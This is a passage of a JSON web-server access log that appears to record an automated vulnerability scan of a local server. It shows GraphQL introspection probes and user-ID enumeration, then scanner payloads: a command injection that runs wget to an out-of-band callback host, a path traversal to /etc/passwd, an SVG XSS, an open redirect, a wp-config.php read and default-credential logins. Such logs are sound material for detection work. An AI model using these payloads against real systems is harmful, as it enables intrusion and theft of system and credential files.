HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:15 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/78 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/78 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:21 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:26 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/79 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:26 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/79 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/81 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/82 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/83 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/84 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/85 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/86 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/87 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/88 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/89 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/90 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/91 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/92 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/93 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/94 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/95 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/96 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/97 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://c9v8ia8smpv8c8qg07h0et81ued8jc74r.oast.me; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"20.057","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/98 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/99 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "14/May/2022:08:33:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.302","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "14/May/2022:08:33:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.352","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "14/May/2022:08:34:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"2.035","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "14/May/2022:08:34:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.119","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "14/May/2022:08:34:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.234","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "14/May/2022:08:34:35 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"2.602","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "14/May/2022:08:34:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"[::]","request":"GET /auth/discovery HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"1.681","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"29K6BWSvoPUjykpZ0GBSfnx7OtS.tld","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?piereg_logout_url=true&redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elfinder.min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"type=login&loginCode=YWRtaW4=&pwd=MDAwMDAw&","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 